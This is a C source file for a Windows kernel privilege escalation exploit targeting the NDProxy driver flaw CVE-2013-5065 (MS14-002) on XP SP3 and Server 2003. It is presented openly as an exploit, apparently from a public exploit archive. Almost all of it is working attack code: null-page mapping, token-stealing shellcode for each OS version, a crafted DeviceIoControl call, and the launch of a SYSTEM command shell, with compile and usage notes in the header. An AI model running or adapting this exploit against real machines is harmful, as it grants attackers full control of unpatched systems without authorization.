1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216 | /*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}
|
